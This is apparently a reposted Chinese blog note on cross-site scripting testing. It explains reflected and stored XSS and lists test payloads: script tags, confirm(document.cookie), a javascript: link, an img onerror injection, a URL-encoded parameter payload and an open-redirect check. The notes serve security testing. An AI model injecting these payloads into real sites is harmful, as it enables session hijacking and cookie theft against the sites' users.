xss跨站腳本測試


測試的時候會涉及到xss測試,下面簡要整理下xss的知識

xss跨站腳本特點就是能注入惡意的HTML/JS代碼到用戶瀏覽器,劫持用戶會話,如果確認存在漏洞,會隨着注入的內容不同而產生危害比如:竊取cookie,網頁掛馬,惡意操作,跨站蠕蟲等等

分類:

反射型:非持久,一般為一個url,需要用戶單擊,在url中參數傳入

持久型:常存在於評論等交互中,常見於<textarea>這種標簽,可用於掛馬釣魚滲透等

可見,為了防止xss,字符過濾可以有效的較少被攻擊的危害,但是xss攻擊不止這么簡單,

它還可以繞過服務端的xss過濾!!!待續

ps:常用的xss攻擊語句列表

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 英文

http://drops.wooyun.org/tips/1955 中文

如果可以發現最基礎的xss可以執行,那么就可以注入其他有害的操作或者獲取信息

例如一些javacript事件:onerror,onfocus,onclick,ontimeout。。。

http://wenku.baidu.com/link?url=q9-QLRlKm788Hdn7F0-Fy2Ujqg8N995-DLk4cS_cXdds1h9lQIvtGf78KbUM55GtKiS6qTwd--Aj6YSsEh2YmiB4VZ611J3pwdj0AeSeApi

--------------------------------------------------------------------------

/***********工作中用到滲透語句:******************/


1. 跨站攻擊

輸入框測試

<--測試方法-->

(1)<a href="javascript:alert(1)"/>我的評論</a>

(2)cookies
"/><script>confirm(document.cookie)
<script>confirm(document.cookie)</scr

(3)<script>alert(1)</script>

 

2. URL跳轉漏洞

<--測試方法-->
修改參數中的合法URL為非法URL,然后查看是否能正常跳轉或者響應包是否包含了任意的構造URL
例子:
(1)http:/xxx.com.cn/post.do?retUrl=javascript:alert(document.cookie)
直接注入到URl里面了
(2)訪問http://xxx.com.cn/login.do?retUrl=http://www.baidu.com
登錄后即可跳轉到www.baidu.com


3. 存儲型跨站

<--測試方法-->
會把攻擊者的數據存儲在服務器端,攻擊行為將伴隨着攻擊數據一直存在
例子:
在頁面源代碼中修改回復內容添加
<img src=http://xxx.com.cn/tesad.gif onerror=alert(666) />

4.參數跨站

<--測試方法-->

http://xxx.com.cn/usr/user.jsp?param_prov=&gender=&prov=&city=&birthday=%3Cscript%3Ealert%281%29%3C/script%3E

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM